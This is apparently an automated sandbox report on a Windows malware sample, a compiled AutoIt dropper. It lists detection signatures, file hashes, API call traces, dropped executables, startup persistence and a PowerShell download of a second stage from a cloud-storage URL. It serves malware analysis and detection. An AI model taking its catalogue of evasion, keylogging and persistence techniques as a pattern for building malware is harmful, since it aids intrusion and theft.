Windows Analysis Report
T6l6gPxwQU.exe

Overview

General Information

Sample name: T6l6gPxwQU.exe
renamed because original name is a hash value
Original sample name: fca042b18adf613d9a2be1646663698f.exe
Analysis ID: 1528376
MD5: fca042b18adf613d9a2be1646663698f
SHA1: a7c91cd17ceeb8b1d0ac9873723f2b35487ca50c
SHA256: 3e358ac78679758f3720dd60d4e5fdff8323f2de436add34238d39c9bf969460
Tags: 64exe

Detection

Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Bypasses PowerShell execution policy
Drops PE files to the user root directory
Drops PE files with a suspicious file extension
Machine Learning detection for sample
Sigma detected: Execution from Suspicious Folder
Sigma detected: Execution of Powershell Script in Public Folder
Sigma detected: Parent in Public Folder Suspicious Process
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: WScript or CScript Dropper
Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the user directory
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

AV Detection

Source: T6l6gPxwQU.exe ReversingLabs: Detection: 42%
Source: Submitted Sample Integrated Neural Analysis Model: Matched 99.8% probability
Source: T6l6gPxwQU.exe Joe Sandbox ML: detected
Source: unknown HTTPS traffic detected: 83.140.241.4:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: T6l6gPxwQU.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: C:\Users\user\Desktop\T6l6gPxwQU.exe Code function: 0_2_00007FF6BB19BC70 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 0_2_00007FF6BB19BC70
Source: C:\Users\user\Desktop\T6l6gPxwQU.exe Code function: 0_2_00007FF6BB1A72A8 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime, 0_2_00007FF6BB1A72A8
Source: C:\Users\user\Desktop\T6l6gPxwQU.exe Code function: 0_2_00007FF6BB1A71F4 FindFirstFileW,FindClose, 0_2_00007FF6BB1A71F4
Source: C:\Users\user\Desktop\T6l6gPxwQU.exe Code function: 0_2_00007FF6BB19B7C0 FindFirstFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 0_2_00007FF6BB19B7C0
Source: C:\Users\user\Desktop\T6l6gPxwQU.exe Code function: 0_2_00007FF6BB162F50 FindFirstFileExW, 0_2_00007FF6BB162F50
Source: C:\Users\user\Desktop\T6l6gPxwQU.exe Code function: 0_2_00007FF6BB1AA4F8 FindFirstFileW,FindNextFileW,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose, 0_2_00007FF6BB1AA4F8
Source: C:\Users\user\Desktop\T6l6gPxwQU.exe Code function: 0_2_00007FF6BB1AA350 FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose, 0_2_00007FF6BB1AA350
Source: C:\Users\user\Desktop\T6l6gPxwQU.exe Code function: 0_2_00007FF6BB1A6428 FindFirstFileW,FindNextFileW,FindClose, 0_2_00007FF6BB1A6428
Source: C:\Users\user\Desktop\T6l6gPxwQU.exe Code function: 0_2_00007FF6BB1AA874 FindFirstFileW,Sleep,FindNextFileW,FindClose, 0_2_00007FF6BB1AA874
Source: C:\Users\user\Desktop\T6l6gPxwQU.exe Code function: 0_2_00007FF6BB19C7C0 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose, 0_2_00007FF6BB19C7C0
Source: C:\Users\Public\InformationCheck.exe Code function: 3_2_00594005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 3_2_00594005
Source: C:\Users\Public\InformationCheck.exe Code function: 3_2_0059494A GetFileAttributesW,FindFirstFileW,FindClose, 3_2_0059494A
Source: C:\Users\Public\InformationCheck.exe Code function: 3_2_0059C2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose, 3_2_0059C2FF
Source: C:\Users\Public\InformationCheck.exe Code function: 3_2_0059CD14 FindFirstFileW,FindClose, 3_2_0059CD14
Source: C:\Users\Public\InformationCheck.exe Code function: 3_2_0059CD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf, 3_2_0059CD9F
Source: C:\Users\Public\InformationCheck.exe Code function: 3_2_0059F5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 3_2_0059F5D8
Source: C:\Users\Public\InformationCheck.exe Code function: 3_2_0059F735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 3_2_0059F735
Source: C:\Users\Public\InformationCheck.exe Code function: 3_2_0059FA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose, 3_2_0059FA36
Source: C:\Users\Public\InformationCheck.exe Code function: 3_2_00593CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 3_2_00593CE2
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: 10_2_00904005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 10_2_00904005
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: 10_2_0090494A GetFileAttributesW,FindFirstFileW,FindClose, 10_2_0090494A
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: 10_2_0090C2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose, 10_2_0090C2FF
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: 10_2_0090CD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf, 10_2_0090CD9F
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: 10_2_0090CD14 FindFirstFileW,FindClose, 10_2_0090CD14
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: 10_2_0090F5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 10_2_0090F5D8
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: 10_2_0090F735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 10_2_0090F735
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: 10_2_0090FA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose, 10_2_0090FA36
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: 10_2_00903CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 10_2_00903CE2
Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: global traffic HTTP traffic detected: GET /v1/ws2/:stream2/:small/small.txt HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 | Host: my.cloudme.com | Connection: Keep-Alive
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\Desktop\T6l6gPxwQU.exe Code function: 0_2_00007FF6BB1AE968 InternetQueryDataAvailable,InternetReadFile, 0_2_00007FF6BB1AE968
Source: global traffic HTTP traffic detected: GET /v1/ws2/:stream2/:small/small.txt HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 | Host: my.cloudme.com | Connection: Keep-Alive
Source: global traffic DNS traffic detected: DNS query: my.cloudme.com
Source: global traffic DNS traffic detected: DNS query: nbhkmKSQnaDrIkubbvvLMhHdgigs.nbhkmKSQnaDrIkubbvvLMhHdgigs
Source: T6l6gPxwQU.exe, 00000000.00000003.1683618137.00000202FF80E000.00000004.00000020.00020000.00000000.sdmp, T6l6gPxwQU.exe, 00000000.00000003.1690464925.00000202FF734000.00000004.00000020.00020000.00000000.sdmp, InformationCheck.exe, 00000003.00000003.1794342033.0000000005BEE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.com/gs/gstimestampingsha2g2.crl0
Source: T6l6gPxwQU.exe, 00000000.00000003.1683618137.00000202FF80E000.00000004.00000020.00020000.00000000.sdmp, T6l6gPxwQU.exe, 00000000.00000003.1690464925.00000202FF734000.00000004.00000020.00020000.00000000.sdmp, InformationCheck.exe, 00000003.00000003.1794342033.0000000005BEE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
Source: T6l6gPxwQU.exe, 00000000.00000003.1683618137.00000202FF80E000.00000004.00000020.00020000.00000000.sdmp, T6l6gPxwQU.exe, 00000000.00000003.1690464925.00000202FF734000.00000004.00000020.00020000.00000000.sdmp, InformationCheck.exe, 00000003.00000003.1794342033.0000000005BEE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
Source: T6l6gPxwQU.exe, 00000000.00000003.1683618137.00000202FF80E000.00000004.00000020.00020000.00000000.sdmp, T6l6gPxwQU.exe, 00000000.00000003.1690464925.00000202FF734000.00000004.00000020.00020000.00000000.sdmp, InformationCheck.exe, 00000003.00000003.1794342033.0000000005BEE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.net/root-r3.crl0
Source: powershell.exe, 00000001.00000002.1768096648.000002BB015FA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://my.cloudme.com
Source: powershell.exe, 00000001.00000002.1768096648.000002BB018FF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1790559122.000002BB10072000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: T6l6gPxwQU.exe, 00000000.00000003.1683618137.00000202FF80E000.00000004.00000020.00020000.00000000.sdmp, T6l6gPxwQU.exe, 00000000.00000003.1690464925.00000202FF734000.00000004.00000020.00020000.00000000.sdmp, InformationCheck.exe, 00000003.00000003.1794342033.0000000005BEE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
Source: T6l6gPxwQU.exe, 00000000.00000003.1683618137.00000202FF80E000.00000004.00000020.00020000.00000000.sdmp, T6l6gPxwQU.exe, 00000000.00000003.1690464925.00000202FF734000.00000004.00000020.00020000.00000000.sdmp, InformationCheck.exe, 00000003.00000003.1794342033.0000000005BEE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp2.globalsign.com/gstimestampingsha2g20
Source: T6l6gPxwQU.exe, 00000000.00000003.1683618137.00000202FF80E000.00000004.00000020.00020000.00000000.sdmp, T6l6gPxwQU.exe, 00000000.00000003.1690464925.00000202FF734000.00000004.00000020.00020000.00000000.sdmp, InformationCheck.exe, 00000003.00000003.1794342033.0000000005BEE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp2.globalsign.com/rootr306
Source: powershell.exe, 00000001.00000002.1768096648.000002BB018A5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000001.00000002.1768096648.000002BB00001000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: T6l6gPxwQU.exe, 00000000.00000003.1683618137.00000202FF80E000.00000004.00000020.00020000.00000000.sdmp, T6l6gPxwQU.exe, 00000000.00000003.1690464925.00000202FF734000.00000004.00000020.00020000.00000000.sdmp, InformationCheck.exe, 00000003.00000003.1794342033.0000000005BEE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
Source: T6l6gPxwQU.exe, 00000000.00000003.1683618137.00000202FF80E000.00000004.00000020.00020000.00000000.sdmp, T6l6gPxwQU.exe, 00000000.00000003.1690464925.00000202FF734000.00000004.00000020.00020000.00000000.sdmp, InformationCheck.exe, 00000003.00000003.1794342033.0000000005BEE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://secure.globalsign.com/cacert/gstimestampingsha2g2.crt0
Source: powershell.exe, 00000001.00000002.1768096648.000002BB01667000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 00000001.00000002.1768096648.000002BB018A5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: T6l6gPxwQU.exe, 00000000.00000003.1683618137.00000202FF80E000.00000004.00000020.00020000.00000000.sdmp, T6l6gPxwQU.exe, 00000000.00000003.1690464925.00000202FF734000.00000004.00000020.00020000.00000000.sdmp, InformationCheck.exe, 00000003.00000003.1794342033.0000000005BEE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: powershell.exe, 00000001.00000002.1768096648.000002BB00001000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000001.00000002.1790559122.000002BB10072000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000001.00000002.1790559122.000002BB10072000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000001.00000002.1790559122.000002BB10072000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000001.00000002.1768096648.000002BB018A5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000001.00000002.1768096648.000002BB0117C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://go.micro
Source: powershell.exe, 00000001.00000002.1768096648.000002BB01365000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://my.cloHJ
Source: powershell.exe, 00000001.00000002.1768096648.000002BB00228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1768096648.000002BB01365000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://my.cloudme.com
Source: powershell.exe, 00000001.00000002.1768096648.000002BB00228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1768096648.000002BB01365000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://my.cloudme.com/v1/ws2/:stream2/:small/small.txt
Source: powershell.exe, 00000001.00000002.1768096648.000002BB018FF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1790559122.000002BB10072000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000001.00000002.1768096648.000002BB01667000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://oneget.org
Source: powershell.exe, 00000001.00000002.1768096648.000002BB01667000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://oneget.orgX
Source: T6l6gPxwQU.exe, 00000000.00000003.1683618137.00000202FF80E000.00000004.00000020.00020000.00000000.sdmp, T6l6gPxwQU.exe, 00000000.00000003.1690464925.00000202FF734000.00000004.00000020.00020000.00000000.sdmp, InformationCheck.exe, 00000003.00000003.1794342033.0000000005BEE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.autoitscript.com/autoit3/
Source: InformationCheck.exe, 00000003.00000003.1794342033.0000000005BEE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.globalsign.com/repository/0
Source: T6l6gPxwQU.exe, 00000000.00000003.1683618137.00000202FF80E000.00000004.00000020.00020000.00000000.sdmp, T6l6gPxwQU.exe, 00000000.00000003.1690464925.00000202FF734000.00000004.00000020.00020000.00000000.sdmp, InformationCheck.exe, 00000003.00000003.1794342033.0000000005BEE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.globalsign.com/repository/06
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown HTTPS traffic detected: 83.140.241.4:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: C:\Users\user\Desktop\T6l6gPxwQU.exe Code function: 0_2_00007FF6BB1B0D24 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard, 0_2_00007FF6BB1B0D24
Source: C:\Users\Public\InformationCheck.exe Code function: 3_2_005A4830 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard, 3_2_005A4830
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: 10_2_00914830 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard, 10_2_00914830
Source: C:\Users\user\Desktop\T6l6gPxwQU.exe Code function: 0_2_00007FF6BB1B0A6C OpenClipboard,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard, 0_2_00007FF6BB1B0A6C
Source: C:\Users\user\Desktop\T6l6gPxwQU.exe Code function: 0_2_00007FF6BB121CEC GetCursorPos,ScreenToClient,GetAsyncKeyState,GetAsyncKeyState,GetWindowLongW, 0_2_00007FF6BB121CEC
Source: C:\Users\Public\InformationCheck.exe Code function: 3_2_005BD164 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW, 3_2_005BD164
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: 10_2_0092D164 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW, 10_2_0092D164

System Summary

Source: C:\Users\user\Desktop\T6l6gPxwQU.exe Code function: This is a third-party compiled AutoIt script. 0_2_00007FF6BB1237B0
Source: T6l6gPxwQU.exe String found in binary or memory: This is a third-party compiled AutoIt script.
Source: T6l6gPxwQU.exe, 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: This is a third-party compiled AutoIt script. memstr_5e6fb49a-f
Source: T6l6gPxwQU.exe, 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer@* memstr_b81c1be3-9
Source: C:\Windows\System32\wscript.exe COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
Source: C:\Users\user\Desktop\T6l6gPxwQU.exe Code function: 0_2_00007FF6BB19C054: CreateFileW,DeviceIoControl,CloseHandle, 0_2_00007FF6BB19C054
Source: C:\Users\user\Desktop\T6l6gPxwQU.exe Code function: 0_2_00007FF6BB18D2C4 GetCurrentProcess,OpenProcessToken,CreateEnvironmentBlock,CloseHandle,CreateProcessWithLogonW,DestroyEnvironmentBlock, 0_2_00007FF6BB18D2C4
Source: C:\Users\user\Desktop\T6l6gPxwQU.exe Code function: 0_2_00007FF6BB19D750 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState, 0_2_00007FF6BB19D750
Source: C:\Users\Public\InformationCheck.exe Code function: 3_2_00595778 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState, 3_2_00595778
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: 10_2_00905778 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState, 10_2_00905778
Source: C:\Users\user\Desktop\T6l6gPxwQU.exe Code function: 0_2_00007FF6BB1BF630 0_2_00007FF6BB1BF630
Source: C:\Users\user\Desktop\T6l6gPxwQU.exe Code function: 0_2_00007FF6BB132E30 0_2_00007FF6BB132E30
Source: C:\Users\user\Desktop\T6l6gPxwQU.exe Code function: 0_2_00007FF6BB133C20 0_2_00007FF6BB133C20
Source: C:\Users\user\Desktop\T6l6gPxwQU.exe Code function: 0_2_00007FF6BB13FA4F 0_2_00007FF6BB13FA4F
Source: C:\Users\user\Desktop\T6l6gPxwQU.exe Code function: 0_2_00007FF6BB1CDB18 0_2_00007FF6BB1CDB18
Source: C:\Users\user\Desktop\T6l6gPxwQU.exe Code function: 0_2_00007FF6BB15793C 0_2_00007FF6BB15793C
Source: C:\Users\user\Desktop\T6l6gPxwQU.exe Code function: 0_2_00007FF6BB12B9F0 0_2_00007FF6BB12B9F0
Source: C:\Users\user\Desktop\T6l6gPxwQU.exe Code function: 0_2_00007FF6BB1A1A18 0_2_00007FF6BB1A1A18
Source: C:\Users\user\Desktop\T6l6gPxwQU.exe Code function: 0_2_00007FF6BB1CBA0C 0_2_00007FF6BB1CBA0C
Source: C:\Users\user\Desktop\T6l6gPxwQU.exe Code function: 0_2_00007FF6BB1B206C 0_2_00007FF6BB1B206C
Source: C:\Users\user\Desktop\T6l6gPxwQU.exe Code function: 0_2_00007FF6BB14C130 0_2_00007FF6BB14C130
Source: C:\Users\user\Desktop\T6l6gPxwQU.exe Code function: 0_2_00007FF6BB125F3C 0_2_00007FF6BB125F3C
Source: C:\Users\user\Desktop\T6l6gPxwQU.exe Code function: 0_2_00007FF6BB12BE70 0_2_00007FF6BB12BE70
Source: C:\Users\user\Desktop\T6l6gPxwQU.exe Code function: 0_2_00007FF6BB14BEB4 0_2_00007FF6BB14BEB4
Source: C:\Users\user\Desktop\T6l6gPxwQU.exe Code function: 0_2_00007FF6BB12B390 0_2_00007FF6BB12B390
Source: C:\Users\user\Desktop\T6l6gPxwQU.exe Code function: 0_2_00007FF6BB16529C 0_2_00007FF6BB16529C
Source: C:\Users\user\Desktop\T6l6gPxwQU.exe Code function: 0_2_00007FF6BB1B32AC 0_2_00007FF6BB1B32AC
Source: C:\Users\user\Desktop\T6l6gPxwQU.exe Code function: 0_2_00007FF6BB12183C 0_2_00007FF6BB12183C
Source: C:\Users\user\Desktop\T6l6gPxwQU.exe Code function: 0_2_00007FF6BB161840 0_2_00007FF6BB161840
Source: C:\Users\user\Desktop\T6l6gPxwQU.exe Code function: 0_2_00007FF6BB19D87C 0_2_00007FF6BB19D87C
Source: C:\Users\user\Desktop\T6l6gPxwQU.exe Code function: 0_2_00007FF6BB1358D0 0_2_00007FF6BB1358D0
Source: C:\Users\user\Desktop\T6l6gPxwQU.exe Code function: 0_2_00007FF6BB14F8D0 0_2_00007FF6BB14F8D0
Source: C:\Users\user\Desktop\T6l6gPxwQU.exe Code function: 0_2_00007FF6BB151750 0_2_00007FF6BB151750
Source: C:\Users\user\Desktop\T6l6gPxwQU.exe Code function: 0_2_00007FF6BB1D17C0 0_2_00007FF6BB1D17C0
